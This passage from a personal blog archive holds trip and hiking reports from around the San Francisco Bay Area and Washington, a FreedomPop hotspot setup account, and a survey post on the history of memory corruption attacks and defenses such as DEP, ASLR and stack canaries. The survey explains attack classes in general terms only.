Upon receiving that email I immediately bought the device (for 39.90$ incl. shipping) and was eagerly waiting for the delivery (which in the end took >10 days). The first trail month of free 2GB of data started immediately upon buying the device and there are only 19 days left now that the device finally arrived. The set-up process is a bit weird as well as FreedomPop offers a feature to find friends with whom you can share surplus data. In addition, you get a free 50MB of data per month for every friend that you add. Naturally there are lists on the internet where you can find such 'friends'. You only have to import them to your gmail address book which in turn is forwarded to FreedomPop. Unfortunately when you search for friends all of them will get a SPAM email from FreedomPop as you leak all your address book to the company. I tried to be clever and removed all email addresses from one of my spare gmail accounts but apparently I forgot to delete some of the 'recently used' addresses and leaked those to FreedomPop (sorry again friends!).

When the device finally arrived I was very eager to get the service up and running. The setup is a bit complicated as you have to start up the WiFi hotspot first and wait until it is able to connect to at least a 3G network. With a quick double-tap on the power button you can display the SSID and the temporary password on the device's screen (it's not 12345 or password as a quick glimpse through the quickstart guide might suggest). When logging in you can then switch to the admin mode using 'password' and I had to execute both "Update 3G PRL" and "Update 3G Profile" until the overdrive was able to connect to 3G. Before the update the device only showed an "Error 67, can not connect to 3G" error message.

Since the update the hotspot has been running flawlessly and a quick speed test shows 0.51Mbps down and 0.39Mbps up which is not too bad for 3G at 10pm. Now fingers crossed for my next conference trip or business trip to hotels where WiFi costs like 20$ per day.

Visiting the capital of the United States: Washington

2013-04-15T21:51:00-04:00

Last weekend Lumi and I traveled to Washington D.C. to explore the capital of the United States. We drove to SFO, parked our car with ParkSFO, a fairly cheap service with regular shuttles to the terminals, and flew to Washington Dulles. As we arrived very late we just took a cab to our hotel, the Westinin Arlington, where we just crashed and slept for a couple of hours.

On Friday I had to get up early for a (super secret) kick-off meeting of a new grant (that will be announced in a couple of days); so I spent all day in a meeting room inside chatting with other researchers while Lumi was exploring the big city, the capitol, the white house, and the national mall. On the plus side we were able to expense the hotel for our weekend in Washington and Lumi was able to explore the capitol and the library which I have already seen on an earlier visit when I stopped in Washington for a couple of days after a conference in Austin, Texas (ISPASS'11 if you are interested), so I did not feel the need to wait in line for a long time to see the capitol again. At night we reunited in the hotel and explored the gym (so-so, just a couple of treadmills and some weights) and enjoyed the pool and the hot tub before we headed off for dinner.

The White House.

On Saturday we started our day with a Starbucks coffee and headed to the national mall where we spent a couple of hours to explore the Air and Space museum (my favorite museum in Washington).

Lumi in front of the Breitling Orbiter, the first balloon to fly around the world.

A picture of the X1, the first plane to fly faster than the speed of sound.

We actually planned to spend only a short amount of time in the museum but we got hooked during the awesome tour and spent almost 4 hours in the museum before we explored the national mall and had a good look at the Washington monument and the Lincoln memorial before we walked through Georgetown with all the small shops and pubs. Georgetown actually felt almost like England.

Looking towards the Lincoln memorial.

The Washington monument all wrapped up.

Lincoln calmly watching the people around him.

Lumi in Georgetown trying to look like a pillar.

On our last day we again returned to the national mall after yet another good-morning coffee and first went to the Jefferson memorial at the shore of Tidal basin. We enjoyed the view of all the cherry trees that were currently in bloom and stopped over for lunch at the cherry blossom festival. Returning to the mall we quickly browsed through the national museum of American history. We felt that the museum was lacking a general theme and a 'red thread' that leads visitors through the exhibits so we just wandered aimlessly through the different rooms, watched the original star spangled banner and headed on towards the national museum of natural history where we were amazed by the different mammals and dinosaurs they showed.

Cheery blossoms for Lumi.

Cheery blossoms for Mathias.

The Jefferson memorial.

At the end of the day we returned to our hotel to grab our bags and returned to the airport. On the way back United managed to be 1 hour late on a 5 hour flight due to congestion at the SFO airport which was a bit annoying especially since we were already returning at 11:40pm (2:40am Washington time). But Lumi drove us safely home and we got a good night's rest. All in all, Washington is an amazing city that has lots to show, from scientific museums both for engineers as well as for the other sciences over cultural and historic information to streets that make you feel as if you are in England.

A couple of days in Carmel and Big Sur

2013-04-07T05:16:00-04:00

To relax after some months of hard working and paper grinding Lumi and I decided to head down to Big Sur and Carmel for some days of relaxing, hiking, and nature watching to reload our batteries. We started off on a lazy Wednesday and drove the 130 miles down to Carmel. Shortly before our destination we took a break, bought some food, and enjoyed ourselves at the beach for an hour or two. The sand was very fine-grained, the sun was shining, but the water was way to cold for swimming (hey, we are still in northern California!). After our lunch we continued to Carmel where we checked into our lovely hotel: Hofsas house.

You can't say no to this lunch place.

Lumi likes it too

For a change we were (for Swiss people) completely unprepared. We only brought all our hiking equipment, walking gear, GeoCaching equipment, and clothes for the 5 days that we would spend here in the Big Sur/Carmel area. We quickly skimmed the maps and saw that there are hiking paths but did not decide on anything. During the check-in the nice lady at the front desk told us about different hiking opportunities in the area, restaurants we had to check out in Carmel, and she also told us that we should head to Point Lobos as a teaser for what we'll see in the next couple of days. The following map shows how little of the area we were actually able to explore in these 5 days (I do not have a GPS log of Point Lobos and Carmel but both can easily be explored without any GPS devices). View 1st Map

Point Lobos (Wednesday)

Point Lobos is a state natural reserve directly at the pacific. The views are amazing and you can watch sea lions laying lazily in the shore while birds fly around them. The park features several short loops that you can walk. For us the park felt like one of the typical American parks where you can drive your car right to each short loop, walk for 15-30 minutes and head back to the car to get out of the park or to the next little loop. We really stretched our time in the park and did almost all the loops - we were especially amazed by Devil's cauldron. All in all we hiked for roughly 3 hours and walked most of the trails that are available. Pack your sweater as it can be really chilly - especially when you are no longer protected by the woods. Park entrance is 10$ per car and you get a great map.

Devil's cauldron from above.

The soup is simmering.

Beautiful flowers.

Beaches that invite for a (refreshing) swim.

Wildlife as well.

Big Sur loop (Thursday)

On the next day we headed to Big Sur national park. On the 23 mile drive to the ranger station we stopped at the big bridge to take a couple of pictures (especially as we stopped here 3 years ago on our Green Tortoise trip). When we arrived at the Big Sur ranger station (day parking is 5$) we asked the ranger for a roughly 10 mile hike and he told us that we should do the short loop. We were a bit surprised that there were no maps and neither did my Garmin GPS have the hiking trails in its internal map, as an additional plus the cell phone had no reception either. So we headed off and just trusted our luck. The trail was amazing and we enjoyed the 7 mile hike to one of the base camps where we turned right to follow our loop. On a steep incline we met two fellow hikers that were apparently lost in the mountains. They had a (very bad and coarse-grained) map and no idea where they were heading. We told them their location and they joined our party on the way back to the ranger station.

The famous bridge in Big Sur.

Our lunch place half-way through the hike.

These redwoods are tall.

The loop was amazing even though we did not see the pacific due to a light drizzle and lots of fog. When we returned to the ranger station we were quite exhausted the 12 mile loop that the ranger told us about turned out to be a 14 mile loop with quite some elevation gain. We were quite happy that we made it and really enjoyed the sauna back at our hotel. We quickly ate some dinner and dropped into our beds for a good night's rest! View 2nd Map

Jacks peak county park and Carmel beach (Friday)

Today was a day to relax and to regain some power in our legs. After breakfast we headed towards Jacks peak county park where we went off for a couple of light loops around the small park. We enjoyed the nice views and the short distances between the trails. As part of our hike we also searched for some GeoCaches so that we can keep up with my parents. After returning to our hotel we enjoyed the pool, the sauna, and went searching for some more GeoCaches in beautiful Carmel. The beach was amazing and we enjoyed a breathtaking sunset at the beach before heading to a very tasty Japanese restaurant (Sushi Heaven). View 3rd Map

Garland ranch regional park (Saturday)

After we relaxed a bit on Friday we were ready for another longer hike in Garland ranch regional park. We started at around 10:30am and arrived in the park by 11am. There is abundant parking at the trailhead and a knowledgeable ranger at the visitor center informed us about the different trails. We bought a map and set off to explore the park. First, we headed straight up to the peak and enjoyed a break on Siesta point before going to the top. Instead of going back towards west as the ranger told us we turned east and headed back on a meandring trail. Apparently the trail is no longer open (although it's still one the map) and we had to sneak by a couple of houses. In addition, a bridge was missing and I had to carry Lumi across a little stream with cold cold water. We had to head back to the highway and sneak back into the park but we finally made it back and lifted a couple of more caches before we headed out. All in all we finished a 10.5 mile (16.7km) loop and we really enjoyed ourselves. Getting lost was actually a huge advantage as we strolled along paths that were not used for years, had to walk through long lost meadows and we actually felt like being on a huge adventure.

Near our second GeoCache of the hike.

Snakes on our trail.

View from above.

Yes, we started down there.

Path through the cursed forest.

Back in Carmel we again enjoyed the sauna (there's nothing better after a day of hiking) and returned to our Japanese chef of choice. Ah, what a great relaxing day. View 4th Map

Carmel beach and returning home (Sunday)

On our last day we decided to stroll once more through beautiful Carmel and relax a bit on the beach before we had to return back home to Albany. In general I can say that we enjoyed our short holidays and we had an active recovery where we hiked a lot, talked a lot, had great and amazing food, and just an awesome time together!

Joaquin Miller park

2013-03-30T20:28:00-04:00

For today's hike we went to Joaquin Miller park in Oakland. The park is about 30min drive from our home and on the way to the park we collected a couple of friends who joined us on today's excursion. The park features nice views of Oakland and the bay and is one of the view 'city' parks where you can stroll into a Redwood grove.

Hike description

All in all it was an easy half-day hike of 4.9 miles (7.9km) that was perfect for us and our friends. We used the time to stroll and chat a lot. During the hike we enjoyed the mixture between views of the Oakland urban area and the Redwood trees and deep forest vegetation. The most strenuous part was when we were trying to short-cut our way to a cache and had to climb over a little hill (straight up on one side and down on the other).

Height profile of our hike.

The hike was not too long and we had plenty of time to relax in between. There are nice picnic areas in the Redwoods and you can enjoy your lunch whilst looking at the wildlife and vegetation around you. View Map

Picture time

Fortunately Doris took a bunch of pictures:

On the top of the hill.

Inside the Redwood grove.

Lunch in the grove and in the sun.

Looking for GeoCaches.

Water break.

This cache is well hidden!

One of the more devious cache hideouts!

Summary

The Joaquin Miller park is what I would call a nice picnic park. There are many short trails that you can use to explore the forest while you are still close to a picnic area all the time. Children can play hide-and-seek or other games on the soft forest ground while more grown ups can use some of the trails for biking as well.

Angel Island

2013-03-23T20:14:00-04:00

Angel Island is a multi-purpose island that is right in the middle of the bay and surrounded by the three big bridges: Golden Gate bridge, Bay bridge, and Richmond bridge. Over the years the island was used for a whole bunch of things, including a hunting ground for native Americans, a Quarantine station for people immigrating to the US, an Army station, and last but not least Angel Island turned into a national park.

Navigation

Angel Island is serviced by different ferries: from Oakland, from San Francisco, and from Tiburon. Tiburon is the closest port and just a stone's throw from Angel Island. In the morning we drove to Tiburon and parked our car near the CVS/pharmacy parking lot (5$/day, the parking close to the ferry is ~20$/day). Please check the ferry schedule before you head to Tiburon and make sure that you add some safety margin as traffic might be slow towards Tiburon. The ferry is 13.50$ per person.

Hike description

The ferry ride from Tiburon to Angel Island is short but very scenic with amazing views of the San Francisco skyline and the Angel Island wild life. We dropped off the ferry at the Ayala cove and started climbing up the North ridge trail until we reached the fire road. The fire road is a broad road that continues around the island. After following the fire road for a bit we followed the Sunset trail up to the Summit of Mount Livermore. Depending on which side of the island you are you are rewarded with awesome views of Tiburon and the back country, the Golden Gate bridge, the San Francisco skyline, Alcatraz, the Bay bridge, Yerba Buena and Treasure Island, Oakland, or the Richmond bridge. On the top of the hill you only have to turn around to switch between these views.

The super high hill is a whooping 260m high.

The hike was fairly easy and we found plenty of time to indulge in the view and to find a couple of GeoCaches on the way. View Map

Summary

All in all it was a very relaxing day and we enjoyed our special day on this beautiful island. The island is great for families too as there are many BBQ places and play grounds. Go there for the amazing views and the laid back atmosphere. There are not too many trails and they might be crowded, especially in summer.

WarGames in memory: shall we play a game?

2013-03-12T05:53:00-04:00

Memory corruption (e.g., buffer overflows, random writes, memory allocation bugs, or uncontrolled format strings) is one of the oldest and most exploited problems in computer science. Low-level languages like C or C++ trade memory safety and type safety for performance: the compiler adds no bound checks and no type checks. The programmer itself is responsible for memory management and type casting which can lead to serious exploitable bugs. Prerequisites for a successful memory corruption are (i) that a pointer is pushed out of bounds (i.e., by iterating over the end of a buffer) or that a pointer becomes dangling (i.e., by freeing the object that a pointer points to) and (ii) that the attacker controls the value written to the out of bounds pointer, e.g., directly through an assignment or indirectly through some management function.

According to academia "buffer overflows are a solved problem" (quote paraphrased according to a member of the panel discussion about system security at INFOCOM'99 in New York). This answer is partially true as there are safe languages that provide memory safety and type safety like, e.g., Java or C#. These languages achieve memory safety by using automatic memory allocation and de-allocation (garbage collection) and adding bound checks to all buffers and structures. In addition, they add a strict type system that disallows casting between mutually exclusive types (e.g., from one struct to another completely disjoint struct).

Figure 1: development of different classes of memory corruption attacks; based on CVE data.

On the other hand if we look at the development of memory corruption attacks since 1999 (Figure 1) we see that the number of these attacks rose until 2007 and is on an all-time high. So we can ask ourselves: what went wrong? On one hand there are new attack vectors (e.g., code-reuse attacks like Return Oriented Programming [39]) and safe languages have (i) too much overhead, (ii) too much latency (languages like Java do not support realtime execution because of stop-the-world garbage collection), (iii) missing support for legacy code, (iv) increased complexity, and (v) missing features like direct memory access for low-level applications.

The goal of this post is to explain different forms of memory corruption attacks and possible defenses that are deployed for current software systems. We will see that attack vectors and defense mechanisms are closely related and through this relation they evolve alongside. This article extends existing surveys and summaries [20, 36] by (i) a study that looks at the symbiosis between attacks and defenses and (ii) an analysis that explains why certain defense mechanisms are used in practice while other mechanisms never see wide adoption.

Attack model

An attacker with restricted privileges forces escalation, e.g., a remote user escalates to a local user account or a local user escalates to a privileged account. Our attack model assumes a white-box approach: the attacker knows both the source code and the binary of the application (so the attacker can execute binary analysis, evaluate the offsets of structs, and recover partial runtime information). A successful attack redirects the control flow to an alternate location and either injected code is executed or alternate data is used during the execution of existing code.

Evolution of attack vectors and defenses

Memory corruption attacks

A memory corruption attack relies on two properties: (i) a live pointer points to illegal data and (ii) said pointer is read or written by the application. An attacker can directly force the pointer out of bounds by exploiting a buffer overflow or underflow that writes across the bounds of a buffer or indirectly by messing with the object that the pointer points to: if this objects is freed or recycled then the pointer is dangling and points to illegal data.

In reality an attacker breaks these two steps into three steps:

Preparation: first the pointer is redirected to an illegal memory location through a spatial bug (the pointer is forced out of bounds) or a temporal bug (making the pointer dangling). Possible attack vectors for the first step are buffer overflows/underflows on the stack or on the heap, integer overflows and underflows, format string exploits, double free, and other memory corruption.
Setup: the attacker uses regular control flow of the application to dereference and write to the pointer. This second step exploits the spatial or temporal memory bug to disable code pointer integrity (all function pointer in the application point to correct and valid code locations), code integrity (the executable code of the application is unchanged),control-flow integrity (the control-flow of the application follows the original programmer-intended pattern), data-integrity (the data of the application is only changed by valid computation), or data-flow integrity (the data-flow in the application follows the intended pattern). A correct execution of an application relies on all of the before mentioned concepts to be enforced at all times. At this point the attacker has control over some data structures and possible targets are overwriting the return instruction pointer (RIP) on the stack, overwriting a function pointer (in the vtable, GOT, or in the .dtor section), forcing an exception (e.g., a NULL pointer dereference), or overwriting heap management data structures.
Execution: finally the control flow is redirected to a location that is controlled by the attacker. The attacker uses either code corruption (new executable code is injected and/or existing code is changed and control-flow is redirected to the injected code), code-reuse attack (existing code is reused in an unintended way), a data-only attack (only the data of the application is changed to adapt the outcome of some computation), or information leakage (internal state is leaked to the attacker) to execute the malicious behavior.

Commonly used attack techniques

To execute malicious code an attacker usually uses one of three techniques: code injection, code reuse, or command injection. Each technique has its advantages and disadvantages and we will discuss them in detail.

Code injection is the oldest technique that achieves code execution. This technique attacks code integrity and injects executable code into data regions. Depending on flags in the page table any data on a memory page may be interpreted as machine code and executed. Prerequisites for this attack are (i) an executable memory area and a known address of a buffer to redirect control to, (ii) partial control of the contents of the buffer in the executable memory area, and (iii) a redirectable control flow to that partially controlled area of the buffer. This technique is nowadays no longer a problem due to increased hardware protection and non-executable memory pages (post 2006).

Code reuse is considered the response to the increased hardware protection against code injection. This technique circumvents control-flow integrity and/or code pointer integrity and reuses existing executable code with alternate data. So called gadgets (short sequences of instructions that usually pop/push registers and execute some computation followed by an indirect control flow transfer) are used to execute a set of prepared invocation frames. Prerequisites for this attack are (i) known addresses of necessary gadgets, (ii) a partially attacker-controlled buffer, and (iii) a redirectable control-flow transfer to the gadget that uses the first invocation frame. Protecting against this technique on a low level is very hard as control-flow integrity relies on checks and validity of all indirect control flow transfers.

Command injection is a third technique that prepares data that is passed to another application or to the kernel (e.g., SQL injection). The technique relies on the fact that unexepcted and unsanitized data is forwarded which leads to unexpected behavior. This technique attacks data integrity and/or data-flow integrity of the application. Prerequisite for this attack is only a missing or faulty sanity check. It is hard to protect against this attack because the source application needs to know about the kind of data the target expects and the context in which the target expects the data.

Defenses and their limitations

A multitude of different defenses have been proposed and discussed but only three defenses are actually used in practice: Data Execution Prevention (DEP), Address Space Layout Randomization (ASLR), and Canaries. None of the defenses is complete and each defense has particular weaknesses and limitations. In combination they offer complete protection against code injection attacks partial protection against code reuse attacks. In general, it can be said that the available defenses merely raise the bar against specific attacks but do not solve the problem of potential memory corruption.

Data Execution Prevention (DEP) prevents applications (and kernels) from code injection attacks. Newer processor add an additional flag (an eXecutable bit) to every entry in the page table. Each page has three bits: Readable (page is readable if set), Writable (page is writable if set), and eXecutable (page contains code that will be executed if control flow branches to this location). Before the eXecutable bit every page was automatically executable and there was no separation between code and data of an application. DEP is a technique that ensures that any page is either Writable xor eXecutable. This scheme protects against code injection attacks by ensuring that no new code can be injected after the application has started and all the code is loaded from disk. A drawback of DEP is that dynamic code generation for, e.g., just-in-time compilation, is not supported. DEP only protects against code injection attacks, all code reuse and other forms of attacks are still possible.

Address Space Layout Randomization (ASLR) is a probabilistic protection that randomizes the locations of individual memory segments (like code, heap, stack, data, memory mapped regions, or libraries). ASLR is an extension of both the operating system (as memory management system calls return random areas) and the loader that needs to load and resolve code at random locations. Hand written exploits often use absolute addressing and need to know the exact location of code they want to branch to or data they want to reuse. Due to random code and data location these attacks are no longer successful. Unfortunately this attack is prone to information leaks: if an attacker is able to extract the locations of specific buffers he/she can use this knowledge for an exploit if the program did not crash. ASLR basically turns a one-shot attack (pwnage on first try) into a two-shot attack (information leak first, pwnage second). A second drawback of ASLR is that some regions remain static upon every run (e.g., on Linux the main executable is often not compiled as position independent executable (PIE) and remains static for every run (including GOT tables, data regions, and code regions); so an attacker can use this static regions to just use a Return Oriented Programming (ROP) attack or more general a code reuse attack. An alternative to two-shot attacks is, e.g., heap spraying. Heap spraying uses the limited number of randomizable bits for a 32-bit memory image and fills the complete heap with copies of NOP slides and the exploit. When the exploit executes the chances are good that the exploit will hit one of the NOP slides and transfer control into the exploit (that is replicated millions of times on the heap).

Comparing PIE with non-PIE executables (Figure 2) [33] using the SPEC CPU2006 benchmarks shows that there is a performance difference of up to 25%. PIE executables reserve a register as a code pointer (due to the randomized locations indirect control flow transfer - indirect call or indirect jump - instructions need to a reference to know where to transfer control to). Due to the additional register usage register pressure increases which slows down overall execution. In reality few programs are compiled as PIE [43].

Figure 2: performance overhead for -fPIE on a 32-bit x86 system.

Canaries are a probabilistic protection against buffer overflows. The compiler places canary values (4 byte for x86 or 8 byte for x64) adjacent to buffers on the stack or on the heap. After every buffer modification the compiler adds an additional check to ensure that the canary is still intact, e.g., the compiler will add a check after a loop that copies values into a buffer. If the canary is replaced with some other value then the check code terminates the application. Canaries have several drawbacks: first, they only protect against continuous writes (i.e., buffer overflows) and not against any other form of direct overwrite. Second, they do not protect against data reads like information leaks. And third, they are, like ASLR, prone to information leaks. Only one random canary is generated for the execution of an application.

Limitations of defenses: DEP gives us code integrity and protects against code injection, but not against any other form of attacks. DEP relies on a hardware extension of the page table. Both canaries and ASLR are probabilistic and prone to information leaks. A one shot attack becomes a two shot attack. In addition, both canaries and ASLR are not free and there are some performance issues or data-layout issues.

The status of current protection is very limited. Current systems have complete protection against code integrity attacks through DEP which is in widespread use. There is limited protection for code pointer integrity and control-flow integrity through probabilistic protections like PointGuard [1], canaries and ASLR. So the code and control flow of an application is (at least partially) protected. What is missing is complete data protecion: there is no data integrity or data-flow integrity, although there are some proposals: WIT [4] using a points-to analysis for data integrity, and DFI using data encryption for data-flow integrity.

An interesting thing to note is that academia came up with many protection mechanisms but they were only used in practice when the burden of the exploits in the wild became too common and the attack techniques became widely known. Stack-based ASLR and canaries where introduced to protect against buffer overflows and code injection attacks on the stack but later extended to the heap and code regions to protect against code reuse attacks as well. DEP is used as an absolute protection against code injection attacks. This arms race between attackers and defenders is interesting to see and a well-equipped attacker has plenty of opportunities to exploit defense mechanisms on current systems. A second factor is that defense mechanisms always bring up a trade-off between available protection, legacy features that are no longer supported and possible performance impact. New defenses are therefore only introduced if the burden of the attacks is too high and too common.

Timeline

The following timeline shows how attacks and defenses developed alongside:

                              Attack  Year  Defense
               Smashing the stack [5] 1996
                      ret-2-libc [18] 1997
                                      1997 StackGuard [17]
        Heap overflow techniques [14] 1999
         Frame pointer overwrite [25] 1999
             Bypassing StackGuard and 2000
                     StackShield [11]
              Format string bugs [29] 2000
                                      2000 libsafe and libverify protect library
                                           functions [6]
                                      2001 ASLR [30]
                                      2001 ProPolice (stack canaries) are
                                           introduced [23]
                                      2001 FormatGuard [15]
    Heap exploits and SEH frames [22] 2002
                                      2002 Visual C++7 adds stack cookies
               Integer overflows [19] 2002
                                      2002 PaX adds W^X using segments and
                                           Kernel ASLR [42]
                                      2003 Visual Studio 2003: SAFESEH
                                      2004 Windows XP2: DEP: RW heap and stack
  ASLR only has 10bit randomness [37] 2004
                   Heap Spraying [38] 2004
                                      2005 Visual Studio 2005: stack cookies
                                           extended with shadow argument copies
                                      2006 PaX protects kernel against NULL
                                           dereferences
                                      2006 Ubuntu 6.06 adds stack and heap ASLR
         Advanced ret-2-libc [28, 36] 2007
          Double free vulnerabilities 2007
                                      2007 Ubuntu adds AppArmor [8]
                                      2007 Windows Vista implements full ASLR
                                           and heap hardening
                  ROP introduced [36] 2007
                                      2008 Ubuntu 8.04 adds pointer obfuscation
                                           for glibc and exec, brk, and
                                           VDSO ASLR [41]
                                      2008 Ubuntu 8.10 builds some apps with
                                           PIE, fortify source, relro [41]
                                      2009 Nozzle: heap spraying [35]
                                      2009 Ubuntu 9.04 implements BIND NOW and
                                           0-address protection [41]
                                      2009 Ubuntu 9.10 implements NX [41]
Memory management vulnerabilities [9] 2010
      New format string exploits [34] 2010

Failed defenses

Many defense mechanisms have been researched and proposed but none of them have seen widespread use except ASLR, DEP, and Canaries. The other defenses failed out of one of the following reasons: (i) too much overhead, (ii) missing programming features, or (iii) no support for legacy code . Too much overhead: as we see for ASLR (active for libraries, disabled for executables) the overhead that is tolerated must be less than 10% and must result in reasonable additional security guarantees. Other proposals that result in higher overhead or lower guarantees did not see widespread use next to the paper where they were published. ISA randomization [25, 7, 42] implements code integrity by randomizing the encoding of individual instructions but results in intolerable 2-3x overhead; PointGuard [1] protects function pointers using an encoding; data-flow integrity tracks the data of an application but results in 2-10x overhead; software-based fault isolation sandboxes [27, 2, 3, 34, 46] implement code and code pointer integrity by verifying all code before execution and result in 1.2x to 2x overhead. There are many other solutions in this category but we see that each solution solves one specific problem at too high a price.

Missing programming features: several proposed defense mechanisms implement a security guarantee by removing specific flexibility in code, data, or the original programming language. Many compiler-based security guarantees like control-flow integrity [1, 21] or data space randomization [4] rely on full program analysis where all code must be compiled and analyzed at the same time. This requirement removes the possibility for modularity (i.e., libraries) and requires that all code is loaded statically. Other features like code diversity or ILR make debugging of applications harder.

No support for legacy code: missing support for legacy code [28] is another problem for many failed defense mechanisms. Is is generally not feasible to rewrite all libraries or applications to add a new security guarantees. A large legacy code base in an existing language must still be supported with the new security features. It is OK to change limited aspects in the runtime system (e.g., ASLR, DEP) or during the compilation process (e.g., adding stack canaries in the data layout) but it is hard to add completely new features (e.g., annotations, rewriting the application in a new language).

Conclusion

Studying the existing defense mechanisms we see that three factors are key for adoption: (i) pressing need through (new) attack vectors, (ii) low overhead for the security solution, and (iii) compatibility to legacy code and legacy features. Only if there exists a clear migration path then the new defense mechanism will be adopted. The WarGames in memory will continue if the security community plays the reactive game. For defenses probabilistic mechanisms only raise the bar but they do not offer a solution. There is no reasonable defense mechanism that supports complete program integrity by combining (i) code integrity, (ii) low overhead control-flow integrity, and (iii) data-flow integrity. Until such a solution exists the war in memory continues and the existing exploit techniques will be used for fun and profit.

References

[1] Abadi, M., Budiu, M., Erlingsson, U., and Ligatti, J. Control-flow integrity. In CCS'05.

[2] Acharya, A., and Raje, M. MAPbox: using parameterized behavior classes to confine untrusted applications. In SSYM'00: Proc. 9th Conf. USENIX Security Symp. (2000), pp. 1--17.

[3] Aggarwal, A., and Jalote, P. Monitoring the security health of software systems. In ISSRE'06: 17th Int'l Symp. Software Reliability Engineering (nov. 2006), pp. 146 --158.

[4] Akritidis, P., Cadar, C., Raiciu, C., Costa, M., and Castro, M. Preventing memory error exploits with WIT. In SP'08: Proc. 2008 IEEE Symposium on Security and Privacy (2008), pp. 263--277.

[5] Aleph1. Smashing the stack for fun and profit. Phrack 7, 49 (Nov. 1996).

[6] Baratloo, A., Singh, N., and Tsai, T. Transparent run-time defense against stack smashing attacks. In Proc. Usenix ATC (2000), pp. 251--262.

[7] Barrantes, E. G., Ackley, D. H., Forrest, S., and Stefanovi, D. Randomized instruction set emulation. ACM Transactions on Information System Security 8 (2005), 3--40.

[8] Bauer, M. Paranoid penguin: an introduction to Novell AppArmor. Linux J. 2006, 148 (2006), 13.

[9] blackngel.The house of lore: Reloaded. Phrack 14, 67 (Nov. 2010).

[10] Bletsch, T., Jiang, X., Freeh, V. W., and Liang, Z. Jump-oriented programming: a new class of code-reuse attack. In ASIACCS'11: Proc. 6th ACM Symp. on Information, Computer and Communications Security (2011), pp. 30--40.

[11] Bulba, and Kil3r. Bypassing stackguard and stackshield. Phrack 10, 56 (Nov. 2000).

[12] Checkoway, S., Davi, L., Dmitrienko, A., Sadeghi, A.-R., Shacham, H., and Winandy, M. Return-oriented programming without returns. In CCS'10: Proceedings of CCS 2010 (2010), A. Keromytis and V. Shmatikov, Eds., ACM Press, pp. 559--572.

[13] Chen, P., Xing, X., Mao, B., Xie, L., Shen, X., and Yin, X. Automatic construction of jump-oriented programming shellcode (on the x86). In ASIACCS'11: Proc. 6th ACM Symp. on Information, Computer and Communications Security (2011), ACM, pp. 20--29.

[14] Conover, M.w00w00 on heap overflows.

[15] Cowan, C., Barringer, M., Beattie, S., Kroah-Hartman, G., Frantzen, M., and Lokier, J. Formatguard: automatic protection from printf format string vulnerabilities. In SSYM'01: Proc. 10th USENIX Security Symp. (2001).

[16] Cowan, C., Beattie, S., Johansen, J., and Wagle, P. PointguardTM: protecting pointers from buffer overflow vulnerabilities. In SSYM'03: Proc. 12th USENIX Security Symp. (2003).

[17] Cowan, C., Pu, C., Maier, D., Hintony, H., Walpole, J., Bakke, P., Beattie, S., Grier, A., Wagle, P., and Zhang, Q. StackGuard: automatic adaptive detection and prevention of buffer-overflow attacks. In SSYM'98: Proc. 7th USENIX Security Symp. (1998).

[18] Designer, S. Return intolibc.

[19] Dowd, M., Spencer, C., Metha, N., Herath, N., and Flake, H. Professional source code auditing, 2002.

[20] Erlingsson, U. Low-level software security: Attacks and defenses. FOSAD'07: Foundations of security analysis and design (2007), 92--134.

[21] Erlingsson, U., Abadi, M., Vrable, M., Budiu, M., and Necula, G. C. XFI: Software guards for system address spaces. In OSDI'06.

[22] Flake, H. Third generation exploitation, 2002.

[23] Haas, P. Advanced format string attacks, DEFCON 18 2010.

[24] Hiroaki, E., and Kunikazu, Y. ProPolice: Improved stack-smashing attack detection. IPSJ SIG Notes (2001), 181--188.

[25] Kc, G. S., Keromytis, A. D., and Prevelakis, V. Countering code-injection attacks with instruction-set randomization. In CCS'03: Proc. 10th Conf. on Computer and Communications Security (2003), pp. 272--280.

[26] klog. The frame pointer overwrite. Phrack 9, 55 (Nov. 1999).

[27] McCamant, S., and Morrisett, G. Evaluating SFI for a CISC architecture. In SSYM'06.

[28] Necula, G., Condit, J., Harren, M., McPeak, S., and Weimer, W. CCured: Type-safe retrofitting of legacy software. vol. 27, ACM, pp. 477--526.

[29] Nergal. The advanced return-into-lib(c) exploits. Phrack 11, 58 (Nov. 2007).

[30] Newsham, T. Format string attacks, 2000.

[31] OWASP. Definition of format string attacks.

[32] PaX-Team. PaX ASLR (Address Space Layout Randomization), 2003.

[33] Payer, M. Too much pie is bad for performance. 2012.

[34] Payer, M., and Gross, T. R. Fine-grained user-space security throughvirtualization. In VEE'11.

[35] Payer, M., and Gross, T. R. String oriented programming: When ASLR is notenough. In Proc. 2nd Program Protection and Reverse Engineering Workshop (2013).

[36] Pincus, J., and Baker, B. Beyond stack smashing: Recent advances in exploiting buffer overruns. IEEE Security and Privacy 2 (2004), 20--27.

[37] Planet, C. A eulogy for format strings. Phrack 14, 67 (2010).

[38] Ratanaworabhan, P., Livshits, B., and Zorn, B. Nozzle: A defense against heap-spraying code injection attacks. In Proceedings of the Usenix Security Symposium (Aug. 2009).

[39] Shacham, H. The geometry of innocent flesh on the bone: Return-into-libc without function calls (on the x86). In CCS'07: Proc. 14th Conf. on Computer and Communications Security (2007), pp. 552--561.

[40] Shacham, H., Page, M., Pfaff, B., Goh, E.-J., Modadugu, N., and Boneh, D. On the effectiveness of address-space randomization. In CCS'04: Proc. 11th Conf. Computer and Communications Security (2004), pp. 298--307.

[41] SkyLined. Internet explorer iframe src&name parameter bof remotecompromise, 2004.

[42] Sovarel, A. N., Evans, D., and Paul, N. Where's the FEEB? the effectiveness of instruction set randomization. In SSYM'05: Proc. 14th Conf. on USENIX Security Symposium (2005).

[43] List of Ubuntu programs built with PIE. March 2013.

[44] Ubuntu securityfeatures, May 2012.

[45] van de Ven, A., and Molnar, I. Exec shield. 2004.

[46] Wahbe, R., Lucco, S., Anderson, T. E., and Graham, S. L. Efficient software-based fault isolation. In SOSP'93.

Dynamite and explosions galore: Point Pinole Regional Shoreline

2013-03-10T19:11:00-04:00

For those that know us personally it is obvious that Lumi and I are the adventurous types, so when we had the opportunity to explore a dangerous dynamite facility we grabbed it! Point Pinole Regional Shoreline is a nice little park with a great view of the upper bay. We left the highway after Richmond and drove to the trailhead (passing a penitentiary on the way) and parked in the overflow parking. I guess it can get pretty crowded on weekends, especially on Sundays in nice spring weather (the park features several BBQ places as well).

The area of the park has been used for many years by Atlas Power Co. and other companies to manufacture gun powder and dynamite. When strolling through the park you can discover many old left-over buildings and bunkers that were used in that area. Some of these places look like old forts and are perfect playgrounds for children to explore.

As we were quite tired from our long Wildcat Canyon hike the day before we just went on an easy stroll through the park of 4.8 miles (7.8km). We explored several of the old facilities and sights but did not find any left over dynamite. On the other hand we finally set off Lumi's GeoCoin and we hope that it travels far and tells us interesting stories from abroad!

View Map

Wildcat Canyon double hike

